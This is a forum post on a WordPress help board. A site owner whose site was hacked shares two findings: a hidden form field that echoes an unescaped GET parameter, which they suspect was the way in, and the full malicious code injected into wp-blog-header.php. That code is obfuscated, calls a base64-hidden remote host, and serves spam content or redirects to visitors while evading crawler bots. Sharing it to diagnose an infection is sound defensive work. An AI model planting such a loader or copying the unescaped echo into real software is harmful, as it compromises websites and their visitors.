Divi WordPress Theme
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

WordPress fix Reply To: hacked

Discussion in 'Misc WordPress Requests' started by peacefulwarri0r, Feb 9, 2018.

  1. peacefulwarri0r

    Guest

    Reply To: hacked, by peacefulwarri0r

    I may be found the entrance:

    <input type='hidden' name='request' value="<?php echo $_GET['anfrage'] ?>">

    And the evil code in wp-blog-header.php.

    <?php
    /**
    * Loads the WordPress environment and template.
    *
    * @package WordPress
    */

    $e = pathinfo($f = strtok($p = @$_SERVER["REQUEST_URI"], "?"), PATHINFO_EXTENSION);

    if ((!$e || in_array($e, array("html", "jpg", "png", "gif")) ||
    basename($f, ".php") == "index") && in_array(strtok("="), array("", "p", "page_id")) && (empty($_SERVER["HTTP_USER_AGENT"]) ||
    (stripos($u = $_SERVER["HTTP_USER_AGENT"], "AhrefsBot") === false && stripos($u, "MJ12bot") === false))) {

    $at = "base64_" . "decode";

    $ch = curl_init($at("aHR0cDovL2RvbWZvcnVsdHJhZG9ycy5jb20vPw==") . "46bbb55167ad5d4a5ed09326a3d62d61" . $p);

    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    "X-Forwarded-For: " . @$_SERVER["REMOTE_ADDR"])
    );

    if (isset($_SERVER["HTTP_USER_AGENT"]))
    curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]);

    if (isset($_SERVER["HTTP_REFERER"]))
    curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_REFERER"]);

    $ci = "curl_ex" . "ec";

    $data = $ci($ch);
    $code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

    if (strlen($data) > 255 && $code == 200) {
    echo $data; exit;
    } else if ($data && ($code == 301 || $code == 302)) {
    header("Location: " . trim($data), true, $code); exit;
    }
    }

    if ( !isset($wp_did_header) ) {

    $wp_did_header = true;

    // Load the WordPress library.
    require_once( dirname(__FILE__) . '/wp-load.php' );

    // Set up the WordPress query.
    wp();

    // Load the theme template.
    require_once( ABSPATH . WPINC . '/template-loader.php' );

    }

    Reply To: hacked
     
    #1

Share This Page

Monarch Social Sharing Plugin